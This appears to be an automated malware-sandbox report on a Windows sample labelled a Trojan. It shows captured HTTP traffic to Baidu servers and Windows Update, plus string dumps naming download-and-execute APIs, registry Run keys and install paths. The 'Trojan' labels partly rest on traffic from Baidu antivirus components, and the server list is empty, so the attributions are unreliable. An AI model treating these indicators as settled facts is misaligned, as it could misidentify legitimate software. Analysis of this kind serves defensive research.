...z.......'" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@....o...]3).!P`...4...)!z..z..f.a...%.Si.@8n..|..82......C.....LS}HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......'" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@....o...]3).!P`...4...)!z..z..f.a...%.Si.@8n..|..82......C.....LS}....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 302
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
...(" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ........OYF..21....z.3.....c..F.XRu...ZHw......Hc..}....J...f.5.L..........15.v.z.D/z.....8(......./...).y..Yq...N....bD...=.........]...s...]...0. ..J.P.g..0.`.f.G.{..Fp..j
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......(" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@...8.. .`}....o..>...O...a.W......-t.F......]..vh{F......3.....?..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......(" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@...8.. .`}....o..>...O...a.W......-t.F......]..vh{F......3.....?......
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
...)" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......Pc...8..>.a.V.7@...w....[1e.../........h.4.%/
...5..~.......H..9.q.=.<..g\.....W...].7*d...,...V5. .....)..B...ro....M<.A..(/.6};W.AV.0.x7.6...K?.q..H..~....L...d..v.pF..TH
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@......K`Fs.....tX )u]..#.....\...Ov.b.kZ...<...n~..&[.....j.L,.Ly.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@......K`Fs.....tX )u]..#.....\...Ov.b.kZ...<...n~..&[.....j.L,.Ly.....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
...*" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......`...._......NH......O....-..|^,..J/z...gw......>..\../.L.Q.#..-...C....XS.p.*. $.W{Qp.vR@.S....;.......q..Q.d..eb...JYf.Z.....Al.\...L.|Q..{e?.D..S-*.&.? .`..-....B..\......C.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......*" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@...#.U...F:..Fe-c0...:'....<[K$...).$..3..%./..~..............w...HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......*" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@...#.U...F:..Fe-c0...:'....<[K$...).$..3..%./..~..............w.......
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
... " b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .........6..c...\..N[[F2..H..R.......yOD.)...Ut.......X.]%.5......]...?>p6.%.=\..wH2.$~.w.4.y.S7N'3<..o...2.ci#..GW.....cZ...W.Q \7...u..H.X.q.H}t...;......u..H......k...j....Z1..J..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z....... " b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@.....?.S ....5...._...#...ww..|.ar......k.9ng~f..W.......\;.n..._.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z....... " b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@.....?.S ....5...._...#...ww..|.ar......k.9ng~f..W.......\;.n..._.....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
...," b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ......Z...v_,?..........c..s.8_..*f...S..P-.................._...W....eQ.........V..j;..Z".0.....Q....
?...&..Om...9...o.aeb..b.z.`..`.YI.K...o.O.%ft._.6{.7b........r..n..RY.x..g
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@.......GWo>Kc......W>}.[.Z..Bp?..>.k.^...=..}..a.lW..^*..........DHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@.......GWo>Kc......W>}.[.Z..Bp?..>.k.^...=..}..a.lW..^*..........D....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z..
...-" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ........._s$.(.DYv.....=..J(....S...]?/.....V.c...$......TGgx.....Q..,...9...c.?-...@.^.....{.....y.9..C...../..0j..................Q..]`/.&...:|..Q..f..\...<Y....?.&6.......5Jg..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@..;....T.O....q....I..l,z .....D..........&D...'.R.....&G78oC.....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@..;....T.O....q....I..l,z .....D..........&D...'.R.....&G78oC.........
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 156
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...x........" b58974f666e28edaba3814768157053d(.........28..7
....K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............i~o
E%(.1bxaK..ua
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 156
...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............b.&......Q.....D.7HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 156.....x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............b.&......Q.....D.7..
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 158
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......t&........^....m@{n.Fj..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 158
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......P.".K5..}.....9......-.mHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 158.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......P.".K5..}.....9......-.m..
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 390
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` ......$t....o-T....E..u..]m.....-OV..)MA.....t..$ZJx.g...A...a..- ...t.......p8.. 5g..}..L....^..4...........Pl.D....H.X...].;.y..4xL....Y)...@Z-..fh.gH/.T-`...)3..l..#.~..^n..........U....H.yZ...B...,...M6.cO.C...3.t.I.GF.]...kWBi..U....C..3.....d.!.........[X
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` .........}.]CXi.........
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` ........
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=7062
Date: Thu, 06 Nov 2014 06:07:48 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=9525
Date: Thu, 06 Nov 2014 06:07:49 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.stl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.....................@.....L.........KNAy8/"...f.......k..Jm7j....R.5q....Rz..!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m..._.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|.@.M.._.....7._6...C.0...A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?...........WE.Or..O>..{.'W2.........3m.O.u..Z8....H4@.w}.o:?~....]<!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!.........`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=...f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..].|......3..y..-./....K..6{...s.<R`.}6....?.......-..@.g..S....
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=7063
Date: Thu, 06 Nov 2014 06:07:47 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=9526
Date: Thu, 06 Nov 2014 06:07:48 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.stl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.....................@.....L.........KNAy8/"...f.......k..Jm7j....R.5q....Rz..!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m..._.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|.@.M.._.....7._6...C.0...A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?...........WE.Or..O>..{.'W2.........3m.O.u..Z8....H4@.w}.o:?~....]<!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!.........`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=...f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..].|......3..y..-./....K..6{...s.<R`.}6....?.......-..@.g..S....
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 76
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...@........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X.` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 132
...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ........
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
BindEx.exe_1568:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
SSShlR@
SSShlR@
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
C:\yqkvod5\YqkEveryday.exe
C:\yqkvod5\YqkEveryday.exe
*.txt
*.txt
%s %s
%s %s
dlinstlit.txt
dlinstlit.txt
URLDownloadToFileA
URLDownloadToFileA
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
PathIsURLW
PathIsURLW
PathIsURLA
PathIsURLA
GetProcessHeap
GetProcessHeap
@BaiduAnTray.exe
@BaiduAnTray.exe
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{63332668-8CE1-445D-A5EE-25929176714E}
{63332668-8CE1-445D-A5EE-25929176714E}
Urlmon
Urlmon
@C:\yqkvod5\FilmAcc.exe
@C:\yqkvod5\FilmAcc.exe
FilmAcc.exe
FilmAcc.exe
@*.lnk
@*.lnk
1, 0, 0, 1
1, 0, 0, 1
BindEx.exe
BindEx.exe
BaiduSdSvc.exe_1500:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
1.0.1.1
1.0.1.1
%d.%d
%d.%d
d-d-d d:d:d
d-d-d d:d:d
RegKey
RegKey
CryptMsgGetParam
CryptMsgGetParam
CryptMsgClose
CryptMsgClose
CertFindCertificateInStore
CertFindCertificateInStore
CertFreeCertificateContext
CertFreeCertificateContext
CertCloseStore
CertCloseStore
CertGetNameStringW
CertGetNameStringW
CryptCATCatalogInfoFromContext
CryptCATCatalogInfoFromContext
RootKey
RootKey
SubKey
SubKey
IsNative64Key
IsNative64Key
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdSvc.pdb
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
BDMFrameWork.dll
BDMFrameWork.dll
SHLWAPI.dll
SHLWAPI.dll
BDMSkin.dll
BDMSkin.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
MSVCP80.dll
MSVCP80.dll
PSAPI.DLL
PSAPI.DLL
WS2_32.dll
WS2_32.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
USERENV.dll
USERENV.dll
WTSAPI32.dll
WTSAPI32.dll
SensApi.dll
SensApi.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
SHDeleteKeyW
SHDeleteKeyW
GetProcessHeap
GetProcessHeap
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegSetKeySecurity
RegSetKeySecurity
RegGetKeySecurity
RegGetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
imagehlp.dll
imagehlp.dll
BaiduSdSvc.exe
BaiduSdSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVTSMsg@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVITSMsgStub@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
;%;'
;%;'
7}8q8>9
7}8q8>9
8Â9V9h9
8Â9V9h9
3F4X4]4r4
3F4X4]4r4
9 9$9(9,9094989
9 9$9(9,9094989
5 6$6(6,6064686
5 6$6(6,6064686
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_CLASSES_ROOT\MediaFoundation
explorer.exe
explorer.exe
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
\BDConfig.dll
\BDConfig.dll
winlogon.exe
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
ntdll.dll
BaiduSdTray.exe
BaiduSdTray.exe
"{0}\{1}" {2}
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
EXPLORER.EXE
EXPLORER.EXE
Global\BDKVMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDKVMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDKVEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\BDKVEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
Global\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
BaiduSd.exe
BaiduSd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
\bdkvrtpplugins\RtpContainerConfig.xml
